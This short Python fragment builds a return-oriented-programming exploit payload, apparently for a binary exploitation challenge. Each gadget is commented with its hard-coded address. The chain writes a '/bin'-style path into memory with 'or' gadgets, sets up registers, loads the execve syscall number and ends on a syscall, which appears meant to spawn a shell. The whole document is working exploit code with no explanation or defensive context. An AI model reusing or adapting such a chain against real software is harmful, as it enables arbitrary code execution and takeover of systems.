payload = p64(0x492f00)
#0x492f00: pop rdi ; retf
payload += p64(0xffffffffcabfcb0c)+p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x6e69622f)+p64(0x40cf31)
# 0x000000000040cf31: or dword ptr [rdi + 0x358ce564], ebp; ret; 
payload += p64(0x492f00)
# 0x492f00: pop rdi ; retf
payload += p64(0xffffffffcabfcb10)+p32(0x40125d)+p32(0x33)
# 0x000000000040125d: pop rbp; ret; 
payload += p64(0x68662f)+p64(0x40cf31)
# 0x000000000040cf31: or dword ptr [rdi + 0x358ce564], ebp; ret; 
payload += p64(0x417ee3)
# 0x0000000000417ee3: pop rax; ret; 
payload += p64(0x0)+p64(0x4aeb7b)
# 0x00000000004aeb7b: xchg edx, eax; ret 0; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4cb070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x417ee3)
# 0x0000000000417ee3: pop rax; ret; 
payload += p64(0x3b)+p64(0x40dff7)
# 0x000000000040dff7: syscall; 
payload += b''
